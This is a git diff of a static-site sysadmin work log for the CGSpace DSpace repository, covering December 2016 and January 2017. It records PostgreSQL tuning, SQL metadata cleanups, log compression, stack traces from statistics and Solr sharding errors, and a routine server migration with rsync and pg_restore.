  • Set PostgreSQL’s shared_buffers on CGSpace to 10% of system RAM (1200MB)
  • +
  • Run the following author corrections on CGSpace:
  • +
+
dspace=# update metadatavalue set authority='34df639a-42d8-4867-a3f2-1892075fcb3f', text_value='Thorne, P.J.' where resource_type_id=2 and metadata_field_id=3 and authority='18349f29-61b1-44d7-ac60-89e55546e812' or authority='021cd183-946b-42bb-964e-522ebff02993';
+dspace=# update metadatavalue set authority='2df8136e-d8f4-4142-b58c-562337cab764', text_value='Thornton, Philip K.', confidence=600 where resource_type_id=2 and metadata_field_id=3 and text_value ~ '^Thornton[,\.]? P.*';
+
    +
  • The authority IDs were different now than when I was looking a few days ago so I had to adjust them here
  • +
+

2016-12-11

+
    +
  • After enabling a sizable shared_buffers in CGSpace’s PostgreSQL configuration, the number of connections to the database dropped significantly
  • +
+

postgres_bgwriter-week +postgres_connections_ALL-week

+
    +
  • Looking at CIAT records from last week again, they have a lot of double authors like:
  • +
+
International Center for Tropical Agriculture::3026b1de-9302-4f3e-85ab-ef48da024eb2::600
+International Center for Tropical Agriculture::3026b1de-9302-4f3e-85ab-ef48da024eb2::500
+International Center for Tropical Agriculture::3026b1de-9302-4f3e-85ab-ef48da024eb2::0
+
    +
  • Some in the same dc.contributor.author field, and some in others like dc.contributor.author[en_US] etc
  • +
  • Removing the duplicates in OpenRefine and uploading a CSV to DSpace says “no changes detected”
  • +
  • Seems like the only way to sort of clean these up would be to start in SQL:
  • +
+
dspace=# select distinct text_value, authority, confidence from metadatavalue where resource_type_id=2 and metadata_field_id=3 and text_value like 'International Center for Tropical Agriculture';
+                  text_value                   |              authority               | confidence
+-----------------------------------------------+--------------------------------------+------------
+ International Center for Tropical Agriculture | cc726b78-a2f4-4ee9-af98-855c2ea31c36 |         -1
+ International Center for Tropical Agriculture |                                      |        600
+ International Center for Tropical Agriculture | 3026b1de-9302-4f3e-85ab-ef48da024eb2 |        500
+ International Center for Tropical Agriculture | cc726b78-a2f4-4ee9-af98-855c2ea31c36 |        600
+ International Center for Tropical Agriculture |                                      |         -1
+ International Center for Tropical Agriculture | cc726b78-a2f4-4ee9-af98-855c2ea31c36 |        500
+ International Center for Tropical Agriculture | 3026b1de-9302-4f3e-85ab-ef48da024eb2 |        600
+ International Center for Tropical Agriculture | 3026b1de-9302-4f3e-85ab-ef48da024eb2 |         -1
+ International Center for Tropical Agriculture | 3026b1de-9302-4f3e-85ab-ef48da024eb2 |          0
+dspace=# update metadatavalue set authority='3026b1de-9302-4f3e-85ab-ef48da024eb2', confidence=600 where resource_type_id=2 and metadata_field_id=3 and text_value = 'International Center for Tropical Agriculture';
+UPDATE 1693
+dspace=# update metadatavalue set authority='3026b1de-9302-4f3e-85ab-ef48da024eb2', text_value='International Center for Tropical Agriculture', confidence=600 where resource_type_id=2 and metadata_field_id=3 and text_value like '%CIAT%';
+UPDATE 35
+
    +
  • Work on article for KM4Dev journal
  • +
+

2016-12-13

+
    +
  • Checking in on CGSpace’s Postgres stats again, it looks like the shared_buffers change from a few days ago really made a big impact:
  • +
+

postgres_bgwriter-week +postgres_connections_ALL-week

+
    +
  • Looking at logs, it seems we need to evaluate which logs we keep and for how long
  • +
  • Basically the only ones we need are dspace.log because those are used for legacy statistics (need to keep for 1 month)
  • +
  • Other logs will be an issue because they don’t have date stamps
  • +
  • I will add date stamps to the logs we’re storing from the tomcat7 user’s cron jobs at least, using: $(date --iso-8601)
  • +
  • Would probably be better to make custom logrotate files for them in the future (a sketch follows the find command below)
  • +
  • Clean up some unneeded log files from 2014 (they weren’t large, just don’t need them)
  • +
  • So basically, new cron jobs for logs should look something like this:
  • +
  • Find any file named *.log* that isn’t dspace.log*, isn’t already zipped, and is older than one day, and zip it:
  • +
+
# find /home/dspacetest.cgiar.org/log -regextype posix-extended -iregex ".*\.log.*" ! -iregex ".*dspace\.log.*" ! -iregex ".*\.(gz|lrz|lzo|xz)" ! -newermt "Yesterday" -exec schedtool -B -e ionice -c2 -n7 xz {} \;
+
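  • A sketch of what a custom logrotate stanza for these logs could eventually look like (the path and retention values are assumptions):

# /etc/logrotate.d/dspace (sketch)
/home/cgspace.cgiar.org/log/*.log {
    daily
    rotate 30
    missingok
    notifempty
    compress
    delaycompress
}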
    +
  • Since there are xzgrep and xzless we can actually just compress them after one day, why not?!
  • +
  • We can keep the zipped ones for two weeks just in case we need to look for errors, etc, and delete them after that
  • +
  • I use schedtool -B and ionice -c2 -n7 to set the CPU scheduling to SCHED_BATCH and the IO to best effort which should, in theory, impact important system processes like Tomcat and PostgreSQL less
  • +
  • When the tasks are running you can see that the policies do apply:
  • +
+
$ schedtool $(ps aux | grep "xz /home" | grep -v grep | awk '{print $2}') && ionice -p $(ps aux | grep "xz /home" | grep -v grep | awk '{print $2}')
+PID 17049: PRIO   0, POLICY B: SCHED_BATCH   , NICE   0, AFFINITY 0xf
+best-effort: prio 7
+
    +
  • All in all this should free up a few gigs (we were at 9.3GB free when I started)
  • +
  • Next thing to look at is whether we need Tomcat’s access logs
  • +
  • I just looked and it seems that we saved 10GB by zipping these logs
  • +
  • Some users pointed out issues with the “most popular” stats on a community or collection
  • +
  • This error appears in the logs when you try to view them:
  • +
+
2016-12-13 21:17:37,486 ERROR org.dspace.app.xmlui.cocoon.DSpaceCocoonServletFilter @ Serious Error Occurred Processing Request!
+org.springframework.web.util.NestedServletException: Handler processing failed; nested exception is java.lang.NoSuchMethodError: com.atmire.statistics.generator.DSpaceObjectDatasetGenerator.toDatasetQuery(Lorg/dspace/core/Context;)Lcom/atmire/statistics/content/DatasetQuery;
+	at org.springframework.web.servlet.DispatcherServlet.doDispatch(DispatcherServlet.java:972)
+	at org.springframework.web.servlet.DispatcherServlet.doService(DispatcherServlet.java:852)
+	at org.springframework.web.servlet.FrameworkServlet.processRequest(FrameworkServlet.java:882)
+	at org.springframework.web.servlet.FrameworkServlet.doPost(FrameworkServlet.java:789)
+	at javax.servlet.http.HttpServlet.service(HttpServlet.java:650)
+	at javax.servlet.http.HttpServlet.service(HttpServlet.java:731)
+	at org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:303)
+	at org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:208)
+	at org.dspace.app.xmlui.cocoon.SetCharacterEncodingFilter.doFilter(SetCharacterEncodingFilter.java:111)
+	at org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:241)
+	at org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:208)
+	at org.dspace.app.xmlui.cocoon.DSpaceCocoonServletFilter.doFilter(DSpaceCocoonServletFilter.java:274)
+	at org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:241)
+	at org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:208)
+	at org.dspace.app.xmlui.cocoon.servlet.multipart.DSpaceMultipartFilter.doFilter(DSpaceMultipartFilter.java:119)
+	at org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:241)
+	at org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:208)
+	at org.apache.tomcat.websocket.server.WsFilter.doFilter(WsFilter.java:52)
+	at org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:241)
+	at org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:208)
+	at org.dspace.utils.servlet.DSpaceWebappServletFilter.doFilter(DSpaceWebappServletFilter.java:78)
+	at org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:241)
+	at org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:208)
+	at org.apache.catalina.core.StandardWrapperValve.invoke(StandardWrapperValve.java:221)
+	at org.apache.catalina.core.StandardContextValve.invoke(StandardContextValve.java:122)
+	at org.apache.catalina.authenticator.AuthenticatorBase.invoke(AuthenticatorBase.java:505)
+	at org.apache.catalina.core.StandardHostValve.invoke(StandardHostValve.java:169)
+	at org.apache.catalina.valves.ErrorReportValve.invoke(ErrorReportValve.java:103)
+	at org.apache.catalina.valves.CrawlerSessionManagerValve.invoke(CrawlerSessionManagerValve.java:180)
+	at org.apache.catalina.valves.AccessLogValve.invoke(AccessLogValve.java:956)
+	at org.apache.catalina.core.StandardEngineValve.invoke(StandardEngineValve.java:116)
+	at org.apache.catalina.connector.CoyoteAdapter.service(CoyoteAdapter.java:436)
+	at org.apache.coyote.http11.AbstractHttp11Processor.process(AbstractHttp11Processor.java:1078)
+	at org.apache.coyote.AbstractProtocol$AbstractConnectionHandler.process(AbstractProtocol.java:625)
+	at org.apache.tomcat.util.net.JIoEndpoint$SocketProcessor.run(JIoEndpoint.java:316)
+	at java.util.concurrent.ThreadPoolExecutor.runWorker(ThreadPoolExecutor.java:1142)
+	at java.util.concurrent.ThreadPoolExecutor$Worker.run(ThreadPoolExecutor.java:617)
+	at org.apache.tomcat.util.threads.TaskThread$WrappingRunnable.run(TaskThread.java:61)
+	at java.lang.Thread.run(Thread.java:745)
+Caused by: java.lang.NoSuchMethodError: com.atmire.statistics.generator.DSpaceObjectDatasetGenerator.toDatasetQuery(Lorg/dspace/core/Context;)Lcom/atmire/statistics/content/DatasetQuery;
+	at com.atmire.statistics.generator.TopNDSODatasetGenerator.toDatasetQuery(SourceFile:39)
+	at com.atmire.statistics.display.StatisticsDataVisitsMultidata.createDataset(SourceFile:108)
+	at org.dspace.statistics.content.StatisticsDisplay.createDataset(SourceFile:384)
+	at org.dspace.statistics.content.StatisticsDisplay.getDataset(SourceFile:404)
+	at com.atmire.statistics.mostpopular.JSONStatsMostPopularGenerator.generateJsonData(SourceFile:170)
+	at com.atmire.statistics.mostpopular.JSONStatsMostPopularGenerator.generate(SourceFile:246)
+	at com.atmire.app.xmlui.aspect.statistics.JSONStatsMostPopular.generate(JSONStatsMostPopular.java:145)
+	at sun.reflect.NativeMethodAccessorImpl.invoke0(Native Method)
+
    +
  • It happens on development and production, so I will have to ask Atmire
  • +
  • Most likely an issue with installation/configuration
  • +
+

2016-12-14

+
    +
  • Atmire sent a quick fix for the last-update.txt file not found error
  • +
  • After applying pull request #291 on DSpace Test I no longer see the error in the logs after the UpdateSolrStorageReports task runs
  • +
  • Also, I’m toying with the idea of moving the tomcat7 user’s cron jobs to /etc/cron.d so we can manage them in Ansible (see the sketch after this list)
  • +
  • Made a pull request with a template for the cron jobs (#75)
  • +
  • Testing SMTP from the new CGSpace server and it’s not working; I’ll have to tell James
  • +
+
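    +
  • The main difference from a per-user crontab is that /etc/cron.d entries carry a user column; a minimal sketch of the format (the file name, schedule, and jobs here are hypothetical, not the actual template in #75):
  • +
+
# /etc/cron.d/dspace-maintenance: hypothetical example, not the real template
+# m  h dom mon dow user    command
+0   3 *   *   *   tomcat7 /home/cgspace.cgiar.org/bin/dspace filter-media
+30  3 *   *   *   tomcat7 /home/cgspace.cgiar.org/bin/dspace index-discovery
+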

2016-12-15

+
    +
  • Start planning for server migration this weekend, letting users know
  • +
  • I am trying to figure out what the process is to update the server’s IP in the Handle system, and emailing the hdladmin account bounces(!)
  • +
  • I will contact Jane Euler directly, as I know I’ve corresponded with her in the past
  • +
  • She said that I should indeed just re-run the [dspace]/bin/dspace make-handle-config command and submit the new sitebndl.zip file to the CNRI website
  • +
  • Also I was troubleshooting some workflow issues from Bizuwork
  • +
  • I re-created the same scenario by adding a non-admin account and submitting an item, but I was able to successfully approve and commit it
  • +
  • So it turns out it’s not a bug, it’s just that Peter was added as a reviewer/admin AFTER the items were submitted
  • +
  • This is how DSpace works, so I need to ask if there is a way to override someone’s claim on a submission, as the other reviewer seems not to be paying attention, or has perhaps taken the item from the task pool
  • +
  • Run a batch edit to add “RANGELANDS” ILRI subject to all items containing the word “RANGELANDS” in their metadata for Peter Ballantyne
  • +
+

Select all items with “rangelands” in metadata +Add RANGELANDS ILRI subject

+

2016-12-18

+
    +
  • Add four new CRP subjects for 2017 and sort the input forms alphabetically (#294)
  • +
  • Test the SMTP on the new server and it’s working
  • +
  • Last week, when we asked CGNET to update the DNS records this weekend, they misunderstood and did it immediately
  • +
  • We quickly told them to undo it, but I just realized they didn’t undo the IPv6 AAAA record!
  • +
  • None of our users in African institutes will have IPv6, but some Europeans might, so I need to check if any submissions have been added since then
  • +
  • Update some names and authorities in the database:
  • +
+
dspace=# update metadatavalue set authority='5ff35043-942e-4d0a-b377-4daed6e3c1a3', confidence=600, text_value='Duncan, Alan' where resource_type_id=2 and metadata_field_id=3 and text_value ~ '^.*Duncan,? A.*';
+UPDATE 204
+dspace=# update metadatavalue set authority='46804b53-ea30-4a85-9ccf-b79a35816fa9', confidence=600, text_value='Mekonnen, Kindu' where resource_type_id=2 and metadata_field_id=3 and text_value like '%Mekonnen, K%';
+UPDATE 89
+dspace=# update metadatavalue set authority='f840da02-26e7-4a74-b7ba-3e2b723f3684', confidence=600, text_value='Lukuyu, Ben A.' where resource_type_id=2 and metadata_field_id=3 and text_value like '%Lukuyu, B%';
+UPDATE 140
+
    +
  • Generated a new UUID for Ben using uuidgen | tr [A-Z] [a-z] as the one in Solr had his ORCID but the name format was incorrect
  • +
  • In theory DSpace should be able to check names from ORCID and update the records in the database, but I find that this doesn’t work (see Jira bug DS-3302)
  • +
  • I need to run these updates along with the other one for CIAT that I found last week
  • +
  • Enable OCSP stapling for hosts >= Ubuntu 16.04 in our Ansible playbooks (#76); the relevant nginx directives are sketched after the test output below
  • +
  • It’s working for DSpace Test, though only on the second request, as nginx fetches and caches the OCSP response lazily after the first one:
  • +
+
$ openssl s_client -connect dspacetest.cgiar.org:443 -servername dspacetest.cgiar.org -tls1_2 -tlsextdebug -status
+...
+OCSP response: no response sent
+$ openssl s_client -connect dspacetest.cgiar.org:443 -servername dspacetest.cgiar.org -tls1_2 -tlsextdebug -status
+...
+OCSP Response Data:
+...
+    Cert Status: good
+
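    +
  • For reference, the nginx side of this is roughly the following (a sketch; the certificate path is an assumption, and the real change lives in the Ansible templates from #76):
  • +
+
# inside the HTTPS server block
+ssl_stapling on;
+ssl_stapling_verify on;
+# the path to the chain/intermediate certificate is an assumption
+ssl_trusted_certificate /etc/letsencrypt/live/dspacetest.cgiar.org/chain.pem;
+resolver 8.8.8.8 8.8.4.4 valid=300s;
+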
    +
  • Migrate CGSpace to new server, roughly following these steps:
  • +
  • On old server:
  • +
+
# service tomcat7 stop
+# /home/backup/scripts/postgres_backup.sh
+
    +
  • On new server:
  • +
+
# systemctl stop tomcat7
+# rsync -4 -av --delete 178.79.187.182:/home/cgspace.cgiar.org/assetstore/ /home/cgspace.cgiar.org/assetstore/
+# rsync -4 -av --delete 178.79.187.182:/home/backup/ /home/backup/
+# rsync -4 -av --delete 178.79.187.182:/home/cgspace.cgiar.org/solr/ /home/cgspace.cgiar.org/solr
+# su - postgres
+$ dropdb cgspace
+$ createdb -O cgspace --encoding=UNICODE cgspace
+$ psql cgspace -c 'alter user cgspace createuser;'
+$ pg_restore -O -U cgspace -d cgspace -W -h localhost /home/backup/postgres/cgspace_2016-12-18.backup
+$ psql cgspace -c 'alter user cgspace nocreateuser;'
+$ psql -U cgspace -f ~tomcat7/src/git/DSpace/dspace/etc/postgres/update-sequences.sql cgspace -h localhost
+$ vacuumdb cgspace
+$ psql cgspace
+postgres=# \i /tmp/author-authority-updates-2016-12-11.sql
+postgres=# \q
+$ exit
+# chown -R tomcat7:tomcat7 /home/cgspace.cgiar.org
+# rsync -4 -av 178.79.187.182:/home/cgspace.cgiar.org/log/*.dat /home/cgspace.cgiar.org/log/
+# rsync -4 -av 178.79.187.182:/home/cgspace.cgiar.org/log/dspace.log.2016-1[12]* /home/cgspace.cgiar.org/log/
+# su - tomcat7
+$ cd src/git/DSpace/dspace/target/dspace-installer
+$ ant update clean_backups
+$ exit
+# systemctl start tomcat7
+
    +
  • It took about twenty minutes and afterwards I had to check a few things, like: +
      +
    • check and enable the systemd timer for Let’s Encrypt
    • +
    • enable root cron jobs
    • +
    • disable root cron jobs on old server after!
    • +
    • enable tomcat7 cron jobs
    • +
    • disable tomcat7 cron jobs on old server after!
    • +
    • regenerate sitebndl.zip with new IP for handle server and submit it to Handle.net (see the sketch after this list)
    • +
    +
  • +
+
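    +
  • For that last step, regenerating the handle server config is roughly the following, per Jane Euler’s instructions (a sketch; the handle-server path is an assumption):
  • +
+
# run as the tomcat7 user; the handle server directory here is an assumption
+$ /home/cgspace.cgiar.org/bin/dspace make-handle-config /home/cgspace.cgiar.org/handle-server
+# then submit the regenerated sitebndl.zip from that directory to the CNRI website
+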

2016-12-22

+
    +
  • Abenet wanted a CSV of the IITA community, but the web export doesn’t include the dc.date.accessioned field
  • +
  • I had to export it from the command line using the -a flag:
  • +
+
$ [dspace]/bin/dspace metadata-export -a -f /tmp/iita.csv -i 10568/68616
+

2016-12-28

+
    +
  • We’ve been getting two alerts per day about CPU usage on the new server from Linode
  • +
  • These are caused by the batch jobs for Solr etc that run in the early morning hours
  • +
  • The Linode default is to alert at 90% CPU usage for two hours, but I see the old server was at 150%, so maybe we just need to raise the alert threshold
  • +
  • Speaking of the old server (linode01), I think we can decommission it now
  • +
  • I checked the S3 logs on the new server (linode18) to make sure the backups have been running and everything looks good
  • +
  • In other news, I was looking at the Munin graphs for PostgreSQL on the new server and it looks slightly worrying:
  • +
+

munin postgres stats

+
    +
  • I will have to check later why the size keeps increasing
  • +
+ + + + + +
+ + + +
+ + + + +
+
+ + + + + + + + + diff --git a/docs/2016/01/xmlui-subjects-after.png b/docs/2016/01/xmlui-subjects-after.png new file mode 100644 index 000000000..bce717356 Binary files /dev/null and b/docs/2016/01/xmlui-subjects-after.png differ diff --git a/docs/2016/01/xmlui-subjects-before.png b/docs/2016/01/xmlui-subjects-before.png new file mode 100644 index 000000000..3664c12e6 Binary files /dev/null and b/docs/2016/01/xmlui-subjects-before.png differ diff --git a/docs/2016/02/cgspace-countries.png b/docs/2016/02/cgspace-countries.png new file mode 100644 index 000000000..0070f09c8 Binary files /dev/null and b/docs/2016/02/cgspace-countries.png differ diff --git a/docs/2016/02/submit-button-drylands.png b/docs/2016/02/submit-button-drylands.png new file mode 100644 index 000000000..eea073186 Binary files /dev/null and b/docs/2016/02/submit-button-drylands.png differ diff --git a/docs/2016/02/submit-button-ilri.png b/docs/2016/02/submit-button-ilri.png new file mode 100644 index 000000000..7b2064904 Binary files /dev/null and b/docs/2016/02/submit-button-ilri.png differ diff --git a/docs/2016/03/bioversity-thumbnail-bad.jpg b/docs/2016/03/bioversity-thumbnail-bad.jpg new file mode 100644 index 000000000..53e7ed35f Binary files /dev/null and b/docs/2016/03/bioversity-thumbnail-bad.jpg differ diff --git a/docs/2016/03/bioversity-thumbnail-good.jpg b/docs/2016/03/bioversity-thumbnail-good.jpg new file mode 100644 index 000000000..02a6e8313 Binary files /dev/null and b/docs/2016/03/bioversity-thumbnail-good.jpg differ diff --git a/docs/2016/03/cua-label-mixup.png b/docs/2016/03/cua-label-mixup.png new file mode 100644 index 000000000..faff0b308 Binary files /dev/null and b/docs/2016/03/cua-label-mixup.png differ diff --git a/docs/2016/03/google-index.png b/docs/2016/03/google-index.png new file mode 100644 index 000000000..a02c5fe96 Binary files /dev/null and b/docs/2016/03/google-index.png differ diff --git a/docs/2016/03/missing-xmlui-string.png b/docs/2016/03/missing-xmlui-string.png new file mode 100644 index 000000000..7119dcfd3 Binary files /dev/null and b/docs/2016/03/missing-xmlui-string.png differ diff --git a/docs/2016/03/url-parameters.png b/docs/2016/03/url-parameters.png new file mode 100644 index 000000000..27aeb1e6d Binary files /dev/null and b/docs/2016/03/url-parameters.png differ diff --git a/docs/2016/03/url-parameters2.png b/docs/2016/03/url-parameters2.png new file mode 100644 index 000000000..39ab4d681 Binary files /dev/null and b/docs/2016/03/url-parameters2.png differ diff --git a/docs/2016/05/discovery-types.png b/docs/2016/05/discovery-types.png new file mode 100644 index 000000000..5652cb554 Binary files /dev/null and b/docs/2016/05/discovery-types.png differ diff --git a/docs/2016/06/xmlui-altmetric-sharing.png b/docs/2016/06/xmlui-altmetric-sharing.png new file mode 100644 index 000000000..594cf3dd7 Binary files /dev/null and b/docs/2016/06/xmlui-altmetric-sharing.png differ diff --git a/docs/2016/07/cgspace-about-page.png b/docs/2016/07/cgspace-about-page.png new file mode 100644 index 000000000..483fc860e Binary files /dev/null and b/docs/2016/07/cgspace-about-page.png differ diff --git a/docs/2016/08/dspace55-ubuntu16.04.png b/docs/2016/08/dspace55-ubuntu16.04.png new file mode 100644 index 000000000..0026da85c Binary files /dev/null and b/docs/2016/08/dspace55-ubuntu16.04.png differ diff --git a/docs/2016/08/nodejs-nginx.png b/docs/2016/08/nodejs-nginx.png new file mode 100644 index 000000000..077b174f2 Binary files /dev/null and b/docs/2016/08/nodejs-nginx.png differ 
diff --git a/docs/2016/09/cgspace-search.png b/docs/2016/09/cgspace-search.png new file mode 100644 index 000000000..5321987bc Binary files /dev/null and b/docs/2016/09/cgspace-search.png differ diff --git a/docs/2016/09/dspacetest-search.png b/docs/2016/09/dspacetest-search.png new file mode 100644 index 000000000..c085aec6d Binary files /dev/null and b/docs/2016/09/dspacetest-search.png differ diff --git a/docs/2016/09/google-webmaster-tools-index.png b/docs/2016/09/google-webmaster-tools-index.png new file mode 100644 index 000000000..bf5aa6e20 Binary files /dev/null and b/docs/2016/09/google-webmaster-tools-index.png differ diff --git a/docs/2016/09/ilri-ldap-users.png b/docs/2016/09/ilri-ldap-users.png new file mode 100644 index 000000000..39ebd3766 Binary files /dev/null and b/docs/2016/09/ilri-ldap-users.png differ diff --git a/docs/2016/09/tomcat_jvm-day.png b/docs/2016/09/tomcat_jvm-day.png new file mode 100644 index 000000000..5eedce2a1 Binary files /dev/null and b/docs/2016/09/tomcat_jvm-day.png differ diff --git a/docs/2016/09/tomcat_jvm-month.png b/docs/2016/09/tomcat_jvm-month.png new file mode 100644 index 000000000..2dae49337 Binary files /dev/null and b/docs/2016/09/tomcat_jvm-month.png differ diff --git a/docs/2016/09/tomcat_jvm-week.png b/docs/2016/09/tomcat_jvm-week.png new file mode 100644 index 000000000..9e9b24fab Binary files /dev/null and b/docs/2016/09/tomcat_jvm-week.png differ diff --git a/docs/2016/10/bootstrap-issue.png b/docs/2016/10/bootstrap-issue.png new file mode 100644 index 000000000..bf8c73b64 Binary files /dev/null and b/docs/2016/10/bootstrap-issue.png differ diff --git a/docs/2016/10/cgspace-icons.png b/docs/2016/10/cgspace-icons.png new file mode 100644 index 000000000..f2053e6d7 Binary files /dev/null and b/docs/2016/10/cgspace-icons.png differ diff --git a/docs/2016/10/cmyk-vs-srgb.jpg b/docs/2016/10/cmyk-vs-srgb.jpg new file mode 100644 index 000000000..2ff62cef6 Binary files /dev/null and b/docs/2016/10/cmyk-vs-srgb.jpg differ diff --git a/docs/2016/10/dspacetest-fontawesome-icons.png b/docs/2016/10/dspacetest-fontawesome-icons.png new file mode 100644 index 000000000..594cc948d Binary files /dev/null and b/docs/2016/10/dspacetest-fontawesome-icons.png differ diff --git a/docs/2016/11/dspacetest-tomcat-jvm-day.png b/docs/2016/11/dspacetest-tomcat-jvm-day.png new file mode 100644 index 000000000..422b70166 Binary files /dev/null and b/docs/2016/11/dspacetest-tomcat-jvm-day.png differ diff --git a/docs/2016/11/dspacetest-tomcat-jvm-week.png b/docs/2016/11/dspacetest-tomcat-jvm-week.png new file mode 100644 index 000000000..6dcd2c253 Binary files /dev/null and b/docs/2016/11/dspacetest-tomcat-jvm-week.png differ diff --git a/docs/2016/11/listings-and-reports-55.png b/docs/2016/11/listings-and-reports-55.png new file mode 100644 index 000000000..d0dcbaad0 Binary files /dev/null and b/docs/2016/11/listings-and-reports-55.png differ diff --git a/docs/2016/11/listings-and-reports.png b/docs/2016/11/listings-and-reports.png new file mode 100644 index 000000000..33709af07 Binary files /dev/null and b/docs/2016/11/listings-and-reports.png differ diff --git a/docs/2016/12/batch-edit1.png b/docs/2016/12/batch-edit1.png new file mode 100644 index 000000000..dd97e271b Binary files /dev/null and b/docs/2016/12/batch-edit1.png differ diff --git a/docs/2016/12/batch-edit2.png b/docs/2016/12/batch-edit2.png new file mode 100644 index 000000000..b6a49aad3 Binary files /dev/null and b/docs/2016/12/batch-edit2.png differ diff --git 
a/docs/2016/12/postgres_bgwriter-week-2016-12-13.png b/docs/2016/12/postgres_bgwriter-week-2016-12-13.png new file mode 100644 index 000000000..f3e8357af Binary files /dev/null and b/docs/2016/12/postgres_bgwriter-week-2016-12-13.png differ diff --git a/docs/2016/12/postgres_bgwriter-week.png b/docs/2016/12/postgres_bgwriter-week.png new file mode 100644 index 000000000..2abcbcaf0 Binary files /dev/null and b/docs/2016/12/postgres_bgwriter-week.png differ diff --git a/docs/2016/12/postgres_connections_ALL-week-2016-12-13.png b/docs/2016/12/postgres_connections_ALL-week-2016-12-13.png new file mode 100644 index 000000000..0373d7002 Binary files /dev/null and b/docs/2016/12/postgres_connections_ALL-week-2016-12-13.png differ diff --git a/docs/2016/12/postgres_connections_ALL-week.png b/docs/2016/12/postgres_connections_ALL-week.png new file mode 100644 index 000000000..fc9cd3276 Binary files /dev/null and b/docs/2016/12/postgres_connections_ALL-week.png differ diff --git a/docs/2016/12/postgres_size_ALL-week.png b/docs/2016/12/postgres_size_ALL-week.png new file mode 100644 index 000000000..e2a6dabec Binary files /dev/null and b/docs/2016/12/postgres_size_ALL-week.png differ diff --git a/docs/2017-01/index.html b/docs/2017-01/index.html new file mode 100644 index 000000000..bf42724a7 --- /dev/null +++ b/docs/2017-01/index.html @@ -0,0 +1,423 @@ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + January, 2017 | CGSpace Notes + + + + + + + + + + + + + + + + + + + + + +
+
+ +
+
+ + + + +
+
+

CGSpace Notes

+

Documenting day-to-day work on the CGSpace repository.

+
+
+ + + + +
+
+
+ + + + +
+
+

January, 2017

+ +
+

2017-01-02

+
    +
  • I checked to see if the Solr sharding task that is supposed to run on January 1st had run and saw there was an error
  • +
  • I tested on DSpace Test as well and it doesn’t work there either
  • +
  • I asked on the dspace-tech mailing list because it seems to be broken, and actually now I’m not sure if we’ve ever had the sharding task run successfully over all these years
  • +
+

2017-01-04

+
    +
  • I tried to shard my local dev instance and it fails the same way:
  • +
+
$ JAVA_OPTS="-Xms768m -Xmx768m -Dfile.encoding=UTF-8" ~/dspace/bin/dspace stats-util -s
+Moving: 9318 into core statistics-2016
+Exception: IOException occured when talking to server at: http://localhost:8081/solr//statistics-2016
+org.apache.solr.client.solrj.SolrServerException: IOException occured when talking to server at: http://localhost:8081/solr//statistics-2016
+        at org.apache.solr.client.solrj.impl.HttpSolrServer.executeMethod(HttpSolrServer.java:566)
+        at org.apache.solr.client.solrj.impl.HttpSolrServer.request(HttpSolrServer.java:210)
+        at org.apache.solr.client.solrj.impl.HttpSolrServer.request(HttpSolrServer.java:206)
+        at org.dspace.statistics.SolrLogger.shardSolrIndex(SourceFile:2291)
+        at org.dspace.statistics.util.StatisticsClient.main(StatisticsClient.java:106)
+        at sun.reflect.NativeMethodAccessorImpl.invoke0(Native Method)
+        at sun.reflect.NativeMethodAccessorImpl.invoke(NativeMethodAccessorImpl.java:62)
+        at sun.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:43)
+        at java.lang.reflect.Method.invoke(Method.java:498)
+        at org.dspace.app.launcher.ScriptLauncher.runOneCommand(ScriptLauncher.java:226)
+        at org.dspace.app.launcher.ScriptLauncher.main(ScriptLauncher.java:78)
+Caused by: org.apache.http.client.ClientProtocolException
+        at org.apache.http.impl.client.AbstractHttpClient.doExecute(AbstractHttpClient.java:867)
+        at org.apache.http.impl.client.CloseableHttpClient.execute(CloseableHttpClient.java:82)
+        at org.apache.http.impl.client.CloseableHttpClient.execute(CloseableHttpClient.java:106)
+        at org.apache.http.impl.client.CloseableHttpClient.execute(CloseableHttpClient.java:57)
+        at org.apache.solr.client.solrj.impl.HttpSolrServer.executeMethod(HttpSolrServer.java:448)
+        ... 10 more
+Caused by: org.apache.http.client.NonRepeatableRequestException: Cannot retry request with a non-repeatable request entity.  The cause lists the reason the original request failed.
+        at org.apache.http.impl.client.DefaultRequestDirector.tryExecute(DefaultRequestDirector.java:659)
+        at org.apache.http.impl.client.DefaultRequestDirector.execute(DefaultRequestDirector.java:487)
+        at org.apache.http.impl.client.AbstractHttpClient.doExecute(AbstractHttpClient.java:863)
+        ... 14 more
+Caused by: java.net.SocketException: Broken pipe (Write failed)
+        at java.net.SocketOutputStream.socketWrite0(Native Method)
+        at java.net.SocketOutputStream.socketWrite(SocketOutputStream.java:109)
+        at java.net.SocketOutputStream.write(SocketOutputStream.java:153)
+        at org.apache.http.impl.io.AbstractSessionOutputBuffer.write(AbstractSessionOutputBuffer.java:181)
+        at org.apache.http.impl.io.ChunkedOutputStream.flushCacheWithAppend(ChunkedOutputStream.java:124)
+        at org.apache.http.impl.io.ChunkedOutputStream.write(ChunkedOutputStream.java:181)
+        at org.apache.http.entity.InputStreamEntity.writeTo(InputStreamEntity.java:132)
+        at org.apache.http.entity.HttpEntityWrapper.writeTo(HttpEntityWrapper.java:89)
+        at org.apache.http.impl.client.EntityEnclosingRequestWrapper$EntityWrapper.writeTo(EntityEnclosingRequestWrapper.java:108)
+        at org.apache.http.impl.entity.EntitySerializer.serialize(EntitySerializer.java:117)
+        at org.apache.http.impl.AbstractHttpClientConnection.sendRequestEntity(AbstractHttpClientConnection.java:265)
+        at org.apache.http.impl.conn.ManagedClientConnectionImpl.sendRequestEntity(ManagedClientConnectionImpl.java:203)
+        at org.apache.http.protocol.HttpRequestExecutor.doSendRequest(HttpRequestExecutor.java:236)
